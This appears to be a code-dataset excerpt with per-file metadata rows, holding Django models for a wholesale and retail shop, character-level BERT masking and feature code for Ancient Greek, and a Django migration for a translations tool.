    id = models.IntegerField(primary_key=True, default=1)
    image = models.TextField(null=True, blank=True, max_length=3000, default=None)
    name = models.CharField(null=True, blank=True, max_length=50)

    def __str__(self):
        return "{}".format(self.name)
class Brands(models.Model):
    """A product brand with an optional display image (stored as text/URL)."""

    id = models.IntegerField(primary_key=True, default=1)
    image = models.TextField(null=True, blank=True, max_length=3000, default=None)
    name = models.CharField(null=True, blank=True, max_length=50)

    def __str__(self):
        return "%s" % self.name
# Create your models here.
class Product(models.Model):
    """A wholesale product listed by a wholeseller, available to a shop."""

    id = models.IntegerField(primary_key=True, default=1)
    username = models.ForeignKey(User, related_name="wholeseller_name", on_delete=models.CASCADE, null=True, blank=True)
    name = models.CharField(max_length=500, null=True, blank=True)
    quantity = models.IntegerField(default=0)
    # Fixed: on_delete was missing on the FKs below; it is a required
    # argument in Django >= 2.0. CASCADE matches the implicit pre-2.0
    # default, so behavior is unchanged.
    defaultProductId = models.ForeignKey("DefaultProduct", on_delete=models.CASCADE, null=True, blank=True)
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
    # Denormalized copy of the shop name for display.
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    wholesale_price = models.FloatField(default=0.0)
    wholesale_mrp = models.FloatField(default=0.0)
    rating = models.FloatField(default=0.0)
    image = models.TextField(default=None, null=True, blank=True, max_length=3000)
    category = models.ForeignKey(Categories, on_delete=models.CASCADE, null=True, blank=True)
    brand = models.ForeignKey(Brands, on_delete=models.CASCADE, null=True, blank=True)
    unit = models.CharField(max_length=10, default="kg", null=True, blank=True)

    def __str__(self):
        return str(self.name)
class RetailProduct(models.Model):
    """A retailer's listing of a wholesale Product with retail pricing."""

    id = models.IntegerField(primary_key=True, default=1)
    retailer = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    quantity = models.IntegerField()
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
    # Denormalized copies for display.
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    productId = models.ForeignKey(Product, on_delete=models.CASCADE)
    productName = models.CharField(max_length=50, null=True, blank=True)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    category = models.ForeignKey(Categories, on_delete=models.CASCADE, null=True, blank=True)
    brand = models.ForeignKey(Brands, on_delete=models.CASCADE, null=True, blank=True)
    retail_price = models.FloatField(default=0.0)
    retail_mrp = models.FloatField(default=0.0)
    rating = models.FloatField(default=0.0)

    def __str__(self):
        return str(self.productId)
class DefaultProduct(models.Model):
    """Canonical catalog entry linking the wholesale and retail listings of a product."""

    id = models.IntegerField(primary_key=True, default=1)
    name = models.CharField(max_length=500)
    rating = models.FloatField(default=0.0)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    category = models.ForeignKey(Categories, on_delete=models.CASCADE, null=True, blank=True)
    brand = models.ForeignKey(Brands, on_delete=models.CASCADE, null=True, blank=True)
    image = models.TextField(default=None, null=True, blank=True, max_length=3000)
    unit = models.CharField(max_length=10, default="kg")
    # Fixed: ``null=True`` has no effect on ManyToManyField (fields.W340).
    wholesellers = models.ManyToManyField(Product, blank=True)
    retailers = models.ManyToManyField(RetailProduct, blank=True)

    def __str__(self):
        return str(self.name)
class Review(models.Model):
    """A user's star rating and text review of a wholesale Product."""

    id = models.IntegerField(primary_key=True, default=1)
    productId = models.ForeignKey(Product, on_delete=models.CASCADE)
    productName = models.CharField(max_length=50, null=True, blank=True)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True, blank=True)
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    name = models.CharField(null=True, blank=True, default="Default Name", max_length=50)
    stars = models.IntegerField()
    review = models.TextField(max_length=1000)
    # Stored as text, not a DateField -- format is whatever the caller writes.
    date = models.CharField(max_length=50, null=True, blank=True)

    def __str__(self):
        return str(self.productId)
class RetailReview(models.Model):
    """A user's star rating and text review of a RetailProduct."""

    id = models.IntegerField(primary_key=True, default=1)
    retailProductId = models.ForeignKey(RetailProduct, on_delete=models.CASCADE)
    retailProductName = models.CharField(max_length=50, null=True, blank=True)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True, blank=True)
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    name = models.CharField(null=True, blank=True, default="Default Name", max_length=50)
    stars = models.IntegerField()
    review = models.TextField(max_length=1000)
    # Stored as text, not a DateField -- format is whatever the caller writes.
    date = models.CharField(max_length=50, null=True, blank=True)

    def __str__(self):
        return str(self.retailProductId)
class Cart(models.Model):
    """A wholesale cart line item: one Product plus quantity for a buyer."""

    id = models.IntegerField(primary_key=True, default=1)
    productId = models.ForeignKey(Product, on_delete=models.CASCADE)
    productName = models.CharField(max_length=50, default="Product Name", null=True, blank=True)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    productPrice = models.FloatField(default=0.0, null=True, blank=True)
    quantity = models.IntegerField()
    # "Active" while in the cart; presumably flipped once ordered -- confirm with views.
    status = models.CharField(max_length=10, default="Active")

    def __str__(self):
        return str(self.productId)
class RetailCart(models.Model):
    """A retail cart line item: one RetailProduct plus quantity for a buyer."""

    id = models.IntegerField(primary_key=True, default=1)
    retailProductId = models.ForeignKey(RetailProduct, on_delete=models.CASCADE)
    retailProductName = models.CharField(max_length=50, default="Retail Product Name", null=True, blank=True)
    # Fixed: on_delete was missing (required in Django >= 2.0);
    # CASCADE matches the implicit pre-2.0 default.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, default=None, null=True, blank=True)
    shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
    username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
    retailProductPrice = models.FloatField(default=0.0, null=True, blank=True)
    quantity = models.IntegerField()
    # "Active" while in the cart; presumably flipped once ordered -- confirm with views.
    status = models.CharField(max_length=10, default="Active")

    def __str__(self):
        return str(self.retailProductId)
class Transaction(models.Model):
    """A wholesale order: the Cart items a buyer purchased from a shop,
    plus payment mode and delivery-tracking details."""
    # NOTE(review): integer PK with default=1 collides once two rows are saved
    # without explicit ids; Django's implicit AutoField is usually preferable.
    id = models.IntegerField(primary_key=True, default=1)
    buyer = models.ForeignKey(User, db_constraint=False, related_name="retailer_name", on_delete=models.CASCADE, null=True, blank=True)
    # on_delete added: it is mandatory from Django 2.0 onward; CASCADE matches
    # the implicit default of Django < 2.0, so behavior is unchanged.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, null=True, blank=True, db_constraint=False)
    shopName = models.CharField(max_length=50, null=True, blank=True)
    seller = models.ForeignKey(User, db_constraint=False, related_name="transaction_wholeseller_name", on_delete=models.CASCADE, null=True, blank=True)
    cartItems = models.ManyToManyField(Cart, db_constraint=False)
    total_amount = models.FloatField(default=0.0)
    date = models.DateTimeField(default=None, null=True, blank=True)
    # Delivery-person assignment and delivery-status bookkeeping.
    delId = models.ForeignKey(User, db_constraint=False, on_delete=models.CASCADE, blank=True, null=True)
    delStatus = models.CharField(max_length=50, default="Order Placed")
    delDate = models.CharField(max_length=50, null=True, blank=True)
    name = models.CharField(max_length=100, null=True, blank=True)
    phno = models.CharField(max_length=10, null=True, blank=True)
    delName = models.CharField(max_length=100, null=True, blank=True)
    delPhno = models.CharField(max_length=10, null=True, blank=True)
    mode = models.CharField(max_length=10, default="Online")
    expectedDate = models.CharField(max_length=50, null=True, blank=True)
    deliveryAddress = models.TextField(max_length=500, null=True, blank=True)

    def __str__(self):
        """Use the primary key as the human-readable identifier."""
        return str(self.id)
class RetailTransaction(models.Model):
    """A retail order: the RetailCart items a buyer purchased from a shop,
    plus payment mode and delivery-tracking details."""
    # NOTE(review): integer PK with default=1 collides once two rows are saved
    # without explicit ids; Django's implicit AutoField is usually preferable.
    id = models.IntegerField(primary_key=True, default=1)
    buyer = models.ForeignKey(User, db_constraint=False, related_name="consumer_name", on_delete=models.CASCADE, null=True, blank=True)
    # on_delete added: it is mandatory from Django 2.0 onward; CASCADE matches
    # the implicit default of Django < 2.0, so behavior is unchanged.
    shopId = models.ForeignKey(Shop, on_delete=models.CASCADE, db_constraint=False, null=True, blank=True)
    shopName = models.CharField(max_length=50, null=True, blank=True)
    seller = models.ForeignKey(User, db_constraint=False, related_name="retail_seller_name", on_delete=models.CASCADE, null=True, blank=True)
    retailCartItems = models.ManyToManyField(RetailCart, db_constraint=False)
    total_amount = models.FloatField(default=0.0)
    date = models.DateTimeField(default=None, null=True, blank=True)
    # Delivery-person assignment and delivery-status bookkeeping.
    delId = models.ForeignKey(User, db_constraint=False, on_delete=models.CASCADE, null=True, blank=True)
    delStatus = models.CharField(max_length=50, default="Order Placed", blank=True)
    # null=True/blank=True added for consistency with Transaction.delDate;
    # this only loosens validation and is backward-compatible.
    delDate = models.CharField(max_length=50, null=True, blank=True)
    name = models.CharField(max_length=100, null=True, blank=True)
    phno = models.CharField(max_length=10, null=True, blank=True)
    delName = models.CharField(max_length=100, null=True, blank=True)
    delPhno = models.CharField(max_length=10, null=True, blank=True)
    mode = models.CharField(max_length=10, default="Online")
    expectedDate = models.CharField(max_length=50, null=True, blank=True)
    deliveryAddress = models.TextField(max_length=500, null=True, blank=True)

    def __str__(self):
        """Use the primary key as the human-readable identifier."""
        return str(self.id)
| 50.945545 | 151 | 0.740647 | 1,359 | 10,291 | 5.485651 | 0.087564 | 0.091751 | 0.129041 | 0.168746 | 0.890543 | 0.877398 | 0.853789 | 0.845339 | 0.816767 | 0.805366 | 0 | 0.018245 | 0.137207 | 10,291 | 201 | 152 | 51.199005 | 0.821376 | 0.024876 | 0 | 0.679012 | 0 | 0 | 0.028819 | 0.002792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.024691 | 0.074074 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
a3da3614f16b05e756d0716cd23220a3164d3b5d | 13,964 | py | Python | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | 5 | 2020-02-15T12:42:45.000Z | 2021-11-11T00:24:41.000Z | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | 3 | 2020-02-15T12:30:46.000Z | 2021-12-13T20:31:35.000Z | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | null | null | null | """Modified utility functions for use with the CharMLM."""
from farm.data_handler.utils import truncate_seq_pair
from greek_char_bert.data_handler.utils import char_mlm_mask_random_words
def remove_unknown_chars(tokens, tokenizer):
    """Replace, in place, every token absent from the tokenizer's vocabulary
    with the special [UNK] token, and return the same list."""
    for idx, token in enumerate(tokens):
        if token not in tokenizer.vocab:
            tokens[idx] = "[UNK]"
    return tokens
# TODO these three samples_to_features variants can probably be combined and a parameter passed to select what functionality is needed
# TODO remove the second seq entirely instead of using a placeholder. We only want to run prediction on individual sequences, not pairs. Alternately, ensure the code doesn't assume a placeholder is used so that the next sequence prediction task can be used with future character based models.
def samples_to_features_bert_char_mlm(sample, max_seq_len, tokenizer):
    """Turn a tokenized sentence pair into character-MLM training features.

    Adapted from farm.data_handler.input_features.samples_to_features_bert_lm,
    but masking is performed by the custom character-level algorithm
    char_mlm_mask_random_words instead of BERT's word-piece masking.

    :param sample: Sample with tokenized "text_a"/"text_b" token lists and an
        "is_next_label" entry in clear_text.
    :param max_seq_len: maximum total sequence length, including the
        [CLS]/[SEP]/[SEP] special tokens.
    :param tokenizer: tokenizer providing ``vocab`` and
        ``convert_tokens_to_ids``.
    :return: a one-element list holding the feature dict (input ids, padding
        mask, segment ids, LM label ids and next-sentence label id).
    """
    tokens_a = sample.tokenized["text_a"]["tokens"]
    tokens_b = sample.tokenized["text_b"]["tokens"]

    # Shrink both sequences in place until they fit alongside the three
    # special tokens ([CLS], [SEP], [SEP] account for the "- 3").
    truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)

    # Mask random characters; each label list holds the original token where
    # a position was masked and "" elsewhere.
    tokens_a, t1_label = char_mlm_mask_random_words(tokens_a)
    # TODO: tokens_b should always be just the "_" placeholder; this call
    # could be dropped once the placeholder is removed entirely.
    tokens_b, t2_label = char_mlm_mask_random_words(tokens_b)

    # Label ids: -1 marks positions that do not contribute to the LM loss.
    t1_label_ids = [tokenizer.vocab[tok] if tok != "" else -1 for tok in t1_label]
    t2_label_ids = [tokenizer.vocab[tok] if tok != "" else -1 for tok in t2_label]
    lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]

    assert len(tokens_b) > 0
    # BERT layout: [CLS] a... [SEP] b... [SEP], segment id 0 for the first
    # part (incl. [CLS] and the first [SEP]) and 1 for the second.
    tokens = ["[CLS]"] + tokens_a + ["[SEP]"] + tokens_b + ["[SEP]"]
    segment_ids = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)

    input_ids = tokenizer.convert_tokens_to_ids(tokens)
    # 1 for real tokens, 0 for padding: only real tokens are attended to.
    padding_mask = [1] * len(input_ids)

    # Zero-pad every sequence out to max_seq_len.
    n_pad = max_seq_len - len(input_ids)
    input_ids += [0] * n_pad
    padding_mask += [0] * n_pad
    segment_ids += [0] * n_pad
    lm_label_ids += [-1] * n_pad

    # BERT convention: next-sentence label id 0 means "is next" is true.
    is_next_label_id = [0] if sample.clear_text["is_next_label"] else [1]

    assert len(input_ids) == max_seq_len
    assert len(padding_mask) == max_seq_len
    assert len(segment_ids) == max_seq_len
    assert len(lm_label_ids) == max_seq_len

    return [{
        "input_ids": input_ids,
        "padding_mask": padding_mask,
        "segment_ids": segment_ids,
        "lm_label_ids": lm_label_ids,
        "label_ids": is_next_label_id,
    }]
def premasked_samples_to_features_bert_char_mlm(sample, max_seq_len, tokenizer):
    """Convert an already-masked sample pair into model-ready features.

    Adapted from farm.data_handler.input_features.samples_to_features_bert_lm;
    unlike samples_to_features_bert_char_mlm no masking is applied here,
    because at prediction time the sample text is assumed to be masked
    already. The LM labels are therefore plain copies of the input tokens.

    :param sample: Sample with tokenized "text_a"/"text_b" token lists and an
        "is_next_label" entry in clear_text.
    :param max_seq_len: maximum total sequence length, including the
        [CLS]/[SEP]/[SEP] special tokens.
    :param tokenizer: tokenizer providing ``vocab`` and
        ``convert_tokens_to_ids``.
    :return: a one-element list holding the feature dict (input ids, padding
        mask, segment ids, LM label ids and next-sentence label id).
    """
    tokens_a = sample.tokenized["text_a"]["tokens"]
    tokens_b = sample.tokenized["text_b"]["tokens"]

    # Shrink both sequences in place until they fit alongside the three
    # special tokens ([CLS], [SEP], [SEP] account for the "- 3").
    truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)

    # Map characters absent from the vocabulary to [UNK].
    tokens_a = remove_unknown_chars(tokens_a, tokenizer)
    tokens_b = remove_unknown_chars(tokens_b, tokenizer)

    # Normally the labels would hold the original unmasked tokens; since the
    # input is pre-masked, the labels are simply copies of the tokens.
    t1_label = tokens_a.copy()
    t2_label = tokens_b.copy()

    # Label ids: -1 marks positions that do not contribute to the LM loss.
    t1_label_ids = [tokenizer.vocab[tok] if tok != "" else -1 for tok in t1_label]
    t2_label_ids = [tokenizer.vocab[tok] if tok != "" else -1 for tok in t2_label]
    lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]

    assert len(tokens_b) > 0
    # BERT layout: [CLS] a... [SEP] b... [SEP], segment id 0 for the first
    # part (incl. [CLS] and the first [SEP]) and 1 for the second.
    tokens = ["[CLS]"] + tokens_a + ["[SEP]"] + tokens_b + ["[SEP]"]
    segment_ids = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)

    input_ids = tokenizer.convert_tokens_to_ids(tokens)
    # 1 for real tokens, 0 for padding: only real tokens are attended to.
    padding_mask = [1] * len(input_ids)

    # Zero-pad every sequence out to max_seq_len.
    n_pad = max_seq_len - len(input_ids)
    input_ids += [0] * n_pad
    padding_mask += [0] * n_pad
    segment_ids += [0] * n_pad
    lm_label_ids += [-1] * n_pad

    # BERT convention: next-sentence label id 0 means "is next" is true.
    is_next_label_id = [0] if sample.clear_text["is_next_label"] else [1]

    assert len(input_ids) == max_seq_len
    assert len(padding_mask) == max_seq_len
    assert len(segment_ids) == max_seq_len
    assert len(lm_label_ids) == max_seq_len

    return [{
        "input_ids": input_ids,
        "padding_mask": padding_mask,
        "segment_ids": segment_ids,
        "lm_label_ids": lm_label_ids,
        "label_ids": is_next_label_id,
    }]
def premasked_samples_with_answers_to_features_bert_char_mlm(
    sample, max_seq_len, tokenizer
):
    """Convert a pre-masked sample *with answers* into model-ready features.

    Copy of samples_to_features_bert_lm from farm/data_handler/input_features.py,
    modified so that no random masking is applied: the text was masked by an
    external algorithm with '#' marking masked positions, and text_a must
    consist of the sequence, a tab, then the answer characters (one per '#').

    :param sample: Sample, containing sentence input as strings and is_next label
    :param max_seq_len: int, maximum length of sequence.
    :param tokenizer: Tokenizer
    :return: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
    """
    tokens_a = sample.tokenized["text_a"]["tokens"]
    tokens_b = sample.tokenized["text_b"]["tokens"]
    # Split "sequence<TAB>answers".
    # NOTE(review): raises IndexError when no tab is present -- presumably the
    # data loader guarantees this format; confirm.
    seq_and_ans = "".join(tokens_a).split("\t")
    tokens_a = seq_and_ans[0]
    ans = seq_and_ans[1]
    # Usually t1_label/t2_label would hold the original unmasked tokens; here
    # t1 is reconstructed from the answers, t2 is a copy of the placeholder.
    t1_label = tokens_a
    t2_label = tokens_b.copy()
    # Construct t1_label by substituting each answer character back into the
    # leftmost remaining '#'.
    for c in ans:
        t1_label = t1_label.replace("#", c, 1)
    # here we're effectively retokenizing (string -> list of characters)...
    tokens_a = list(tokens_a)
    t1_label = list(t1_label)
    # Modifies `tokens_a` and `tokens_b` in place so the total length fits
    # within max_seq_len - 3 (accounting for [CLS], [SEP], [SEP]).
    # NOTE(review): t1_label was built from the *untruncated* text; if
    # truncate_seq_pair actually shortens tokens_a, the label list stays
    # longer and the length asserts below fail (and the conversions check
    # would too if a '#' were truncated). Inputs are presumably pre-sized to
    # fit -- confirm.
    truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)
    # Convert the external '#' masking into BERT's [MASK] token.
    conversions = 0
    for i, t in enumerate(tokens_a):
        if t == "#":
            tokens_a[i] = "[MASK]"
            conversions += 1
    assert conversions == len(ans)
    # Map characters absent from the vocabulary to [UNK].
    tokens_a = remove_unknown_chars(tokens_a, tokenizer)
    t1_label = remove_unknown_chars(t1_label, tokenizer)
    # Convert LM labels to ids; -1 marks positions excluded from the LM loss.
    t1_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t1_label]
    t2_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t2_label]
    # Concatenate LM labels and account for CLS, SEP, SEP.
    lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]
    # BERT layout: [CLS] a... [SEP] b... [SEP], segment id 0 for the first
    # sequence (incl. [CLS] and the first [SEP]) and 1 for the second.
    tokens = []
    segment_ids = []
    tokens.append("[CLS]")
    segment_ids.append(0)
    for token in tokens_a:
        tokens.append(token)
        segment_ids.append(0)
    tokens.append("[SEP]")
    segment_ids.append(0)
    assert len(tokens_b) > 0
    for token in tokens_b:
        tokens.append(token)
        segment_ids.append(1)
    tokens.append("[SEP]")
    segment_ids.append(1)
    input_ids = tokenizer.convert_tokens_to_ids(tokens)
    # The mask has 1 for real tokens and 0 for padding tokens. Only real
    # tokens are attended to.
    padding_mask = [1] * len(input_ids)
    # Zero-pad up to the sequence length.
    while len(input_ids) < max_seq_len:
        input_ids.append(0)
        padding_mask.append(0)
        segment_ids.append(0)
        lm_label_ids.append(-1)
    # Convert is_next_label: note that in BERT, is_next_label_id == 0 is used
    # for next_sentence=true!
    if sample.clear_text["is_next_label"]:
        is_next_label_id = [0]
    else:
        is_next_label_id = [1]
    assert len(input_ids) == max_seq_len
    assert len(padding_mask) == max_seq_len
    assert len(segment_ids) == max_seq_len
    assert len(lm_label_ids) == max_seq_len
    feature_dict = {
        "input_ids": input_ids,
        "padding_mask": padding_mask,
        "segment_ids": segment_ids,
        "lm_label_ids": lm_label_ids,
        "label_ids": is_next_label_id,
    }
    return [feature_dict]
| 39.224719 | 359 | 0.676812 | 2,145 | 13,964 | 4.215385 | 0.122611 | 0.008626 | 0.010949 | 0.011944 | 0.832891 | 0.826476 | 0.82161 | 0.814311 | 0.805242 | 0.805242 | 0 | 0.0169 | 0.237253 | 13,964 | 355 | 360 | 39.335211 | 0.832035 | 0.503223 | 0 | 0.786982 | 0 | 0 | 0.049261 | 0 | 0 | 0 | 0 | 0.005634 | 0.094675 | 1 | 0.023669 | false | 0 | 0.011834 | 0 | 0.059172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
430041d08aaf368081a18a956496f877409612f3 | 6,971 | py | Python | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | null | null | null | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | 3 | 2021-09-02T13:59:18.000Z | 2022-02-28T17:08:18.000Z | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-17 19:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
    """Initial migration for the translations app.

    Creates Translation and TranslationGroup plus their django-simple-history
    shadow tables (HistoricalTranslation, HistoricalTranslationGroup).
    Auto-generated by Django; the repeated per-language fields (en/pl/de/ru)
    and duplicated state choice lists mirror the model definitions.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Self-referential tree of translation groups with per-language names.
        migrations.CreateModel(
            name='TranslationGroup',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name_en', models.CharField(blank=True, max_length=255)),
                ('name_pl', models.CharField(blank=True, max_length=255)),
                ('name_de', models.CharField(blank=True, max_length=255)),
                ('name_ru', models.CharField(blank=True, max_length=255)),
                ('order_index', models.IntegerField(default=0)),
                ('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='translations.translationgroup')),
            ],
        ),
        # A translation key with per-language values and workflow states.
        migrations.CreateModel(
            name='Translation',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('key', models.TextField(db_index=True, max_length=2000)),
                ('value_en', models.TextField(blank=True, max_length=2000)),
                ('value_pl', models.TextField(blank=True, max_length=2000)),
                ('value_de', models.TextField(blank=True, max_length=2000)),
                ('value_ru', models.TextField(blank=True, max_length=2000)),
                ('state_en', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_pl', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_de', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_ru', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('order_index', models.IntegerField(default=0)),
                ('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='translations.translationgroup')),
            ],
        ),
        # simple_history mirror of TranslationGroup: one row per change, with
        # who/when/what-kind-of-change metadata.
        migrations.CreateModel(
            name='HistoricalTranslationGroup',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('name_en', models.CharField(blank=True, max_length=255)),
                ('name_pl', models.CharField(blank=True, max_length=255)),
                ('name_de', models.CharField(blank=True, max_length=255)),
                ('name_ru', models.CharField(blank=True, max_length=255)),
                ('order_index', models.IntegerField(default=0)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='translations.translationgroup')),
            ],
            options={
                'verbose_name': 'historical translation group',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # simple_history mirror of Translation.
        migrations.CreateModel(
            name='HistoricalTranslation',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('key', models.TextField(db_index=True, max_length=2000)),
                ('value_en', models.TextField(blank=True, max_length=2000)),
                ('value_pl', models.TextField(blank=True, max_length=2000)),
                ('value_de', models.TextField(blank=True, max_length=2000)),
                ('value_ru', models.TextField(blank=True, max_length=2000)),
                ('state_en', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_pl', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_de', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('state_ru', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
                ('order_index', models.IntegerField(default=0)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='translations.translationgroup')),
            ],
            options={
                'verbose_name': 'historical translation',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
    ]
| 70.414141 | 219 | 0.601635 | 762 | 6,971 | 5.307087 | 0.133858 | 0.066766 | 0.057864 | 0.071217 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0 | 0.021183 | 0.221202 | 6,971 | 98 | 220 | 71.132653 | 0.723706 | 0.006455 | 0 | 0.791209 | 1 | 0 | 0.218082 | 0.029607 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043956 | 0 | 0.087912 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
